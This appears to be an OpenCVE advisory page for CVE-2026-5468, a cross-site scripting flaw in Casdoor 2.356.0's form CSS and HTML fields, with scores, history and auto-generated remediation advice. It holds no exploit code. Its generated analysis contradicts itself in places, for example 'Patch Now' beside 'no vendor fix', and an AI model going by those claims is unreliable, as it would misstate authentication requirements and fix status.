Description
A security flaw has been discovered in Casdoor 2.356.0. This affects the function dangerouslySetInnerHTML. Performing a manipulation of the argument formCss/formCssMobile/formSideHtml results in cross site scripting. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2026-04-03
Score: 5.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑site scripting
Action: Patch Now
AI Analysis

Impact

A flaw in Casdoor 2.356.0 allows malicious content to be passed into the dangerouslySetInnerHTML function through user‑supplied fields such as formCss, formCssMobile, or formSideHtml. When the application renders these fields without proper filtering, injected scripts are executed in the victim’s browser. The result is classic client‑side code execution, enabling session hijacking, defacement, or further lateral exploitation.

Affected Systems

Only users running Casdoor 2.356.0 are affected. Earlier or later releases that have been updated to remove the vulnerable function are not impacted. No other vendors or products are listed as affected.

Risk and Exploitability

The CVSS score of 5.1 places this issue in the medium severity range, while an EPSS score of less than 1% suggests that exploitation activity is currently low. Because the flaw can be triggered remotely, any authenticated or potentially unauthenticated user interacting with the affected interfaces may exploit it. The vulnerability is not yet in the CISA KEV catalog, but the public release of an exploit script means attackers could weaponize it before a patch is applied.

Generated by OpenCVE AI on April 9, 2026 at 02:50 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply a vendor patch or upgrade to a version that removes the dangerouslySetInnerHTML misuse
  • If no patch is available, remove or sanitize the formCss, formCssMobile, and formSideHtml inputs on the server side
  • Implement a strict Content Security Policy that blocks inline scripts and disallows unsafe eval
  • Continuously monitor application logs for unexpected use of these parameters and inspect user activity for signs of XSS exploitation

Generated by OpenCVE AI on April 9, 2026 at 02:50 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Thu, 09 Apr 2026 01:00:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:casbin:casdoor:2.356.0:*:*:*:*:*:*:*

Tue, 07 Apr 2026 00:00:00 +0000

Type Values Removed Values Added
First Time appeared Casbin
Casbin casdoor
Vendors & Products Casbin
Casbin casdoor

Fri, 03 Apr 2026 16:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 03 Apr 2026 14:00:00 +0000

Type Values Removed Values Added
Description A security flaw has been discovered in Casdoor 2.356.0. This affects the function dangerouslySetInnerHTML. Performing a manipulation of the argument formCss/formCssMobile/formSideHtml results in cross site scripting. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Title Casdoor dangerouslySetInnerHTML cross site scripting
Weaknesses CWE-79
CWE-94
References
Metrics cvssV2_0

{'score': 4, 'vector': 'AV:N/AC:L/Au:S/C:N/I:P/A:N/E:POC/RL:ND/RC:UR'}

cvssV3_0

{'score': 3.5, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R'}

cvssV3_1

{'score': 3.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R'}

cvssV4_0

{'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P'}

Subscriptions

Casbin Casdoor
cve-icon MITRE

Status: PUBLISHED

Assigner: VulDB

Published:

Updated: 2026-04-03T15:20:10.722Z

Reserved: 2026-04-03T07:25:58.219Z

Link: CVE-2026-5468

cve-icon Vulnrichment

Updated: 2026-04-03T15:20:06.911Z

cve-icon NVD

Status : Analyzed

Published: 2026-04-03T14:16:33.837

Modified: 2026-04-09T00:57:43.527

Link: CVE-2026-5468

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-09T08:29:16Z

Weaknesses